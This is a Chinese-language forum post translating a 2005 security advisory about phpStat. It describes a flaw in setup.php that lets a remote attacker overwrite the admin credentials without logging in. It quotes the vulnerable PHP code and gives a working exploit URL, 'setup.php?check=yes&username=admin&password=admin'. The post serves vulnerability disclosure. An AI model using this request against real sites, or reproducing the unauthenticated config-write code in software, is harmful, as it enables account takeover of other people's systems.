[翻译]phpStat'setup.php'中存在让远程攻击者修改管理员密码的漏洞
资料翻译: fpx[BCT]翻译网站: Bug.Center.Team [url]http://www.cnbct.org[/url]
SecurityTracker ID: 1014064
漏洞引用: http:// securitytracker.com/id?1014064
CVE 叁考: GENERIC-MAP-NOMATCH
日期: 2005 年5月 27 日
影响: 攻击者可以通过网络修改信息
摘要: SoulBlack 安全组织公布phpStart存在一个漏洞,远程攻击者利用此漏洞可以得到管理员信息。攻击者通过构造特殊的URL,通过'setup.php' 修改任意用户的密码,然后用此用户登陆。
漏洞示范:
setup.php?check=yes&username=admin&password=admin
解决: 官方尚未解决方案。
厂商网址: phpstat.sourceforge.net/journal/
-------------------------------------------------------------
* 漏洞代码 *
setup.php的$check 变量中存在漏洞 .
include("config.php");
include("$path_data/setup.php");
$check = $_REQUEST['check'];
$pass = $_REQUEST['pass'];
$user = $_REQUEST['user'];
if ($check == "admin" && $pass == $password && $user == $username) {
showsetup();
} elseif (($check == "admin") && ($pass != $password || $user != $username)) {
adminerror();
} elseif ($check == "yes") {
write($_REQUEST);
} else {
admin();
/*
setup.php?check=yes..... 给送给 "write()"函数
*/
function write($_REQUEST) {
include("config.php");
.
.
.
.
$admin = strtolower($_REQUEST['admin']);
$username = strtolower($_REQUEST['username']);
$password = strtolower($_REQUEST['password']);
$fp = fopen("$path_data/setup.php", "wb") or die ("The File
\"$path_data/setup.php\" does not exist");
flock( $fp, 2);
fputs ($fp, "<?php\n\$show = \"$show\";\n\$refshow =
\"$refshow\";\n\$ldec = \"$ldec\";\n\$lcolor = \"$lcolor\";\n\$hcolor
= \"$hcolor\";\n\$font_family = \"$font_family\";\n\$font_size =
\"$font_size\";\n\$color = \"$color\";\n\$font_style =
\"$font_style\";\n\$font_weight = \"$font_weight\";\n\$letter_spacing
= \"$letter_spacing\";\n\$admin = \"$admin\";\n\$username =
\"$username\";\n\$password = \"$password\";\n?>");
flock( $fp, 1);
fclose ($fp);
具体利用:
setup.php?check=yes&username=admin&password=admin
即可修改admin的密码. 上面已经是彻底翻译的版本来的阿!其余都是例子来的!当然是英文的阿!难道中文解释阿!?
页:
[1]